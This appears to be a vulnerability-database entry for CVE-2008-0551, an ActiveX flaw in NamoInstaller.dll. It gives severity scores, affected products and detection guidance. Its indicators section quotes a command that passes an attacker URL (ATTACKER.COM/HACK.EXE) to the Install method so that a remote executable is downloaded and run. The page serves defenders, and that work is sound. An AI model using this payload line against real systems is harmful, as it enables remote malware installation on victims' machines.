cbcvebase.
CVE-2008-0551
published 2008-02-01

CVE-2008-0551: The NamoInstaller.NamoInstall.1 ActiveX control in NamoInstaller.dll 3.0.0.1 and earlier in Namo Web Editor in Sejoong Namo ActiveSquare 6 allows remote…

PriorityP348critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
29.75%
98.0th percentile
The NamoInstaller.NamoInstall.1 ActiveX control in NamoInstaller.dll 3.0.0.1 and earlier in Namo Web Editor in Sejoong Namo ActiveSquare 6 allows remote attackers to execute arbitrary code via a URL in the argument to the Install method. NOTE: some of these details are obtained from third party information.

Affected

2 ranges
VendorProductVersion rangeFixed in
sejoong_namoactivesquare
sejoong_namonamoinstall.1_activex_control

Detection & IOCsextracted from sources · hover to see the quote

filenameNamoInstaller.dll
commandobj.Install("http://ATTACKER.COM/HACK.EXE")
  • Monitor ActiveX instantiation of the ProgID 'NamoInstaller.NamoInstall.1' — exploitation occurs via a long argument passed to its Install() method, which triggers a buffer overflow
  • The exploit delivers a remote executable via the Install() method argument (URL pointing to attacker-controlled .EXE); monitor for browser-spawned processes fetching executables via this ActiveX control
  • ·The NVD source (DOC 1) describes CVE-2008-0634, which is explicitly noted as a *different* vulnerability than CVE-2008-0551; the exploit-db entry (DOC 2) covers the same NamoInstaller.dll Install() method but may overlap both CVEs — treat extracted indicators as potentially applicable to both CVE-2008-0551 and CVE-2008-0634
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.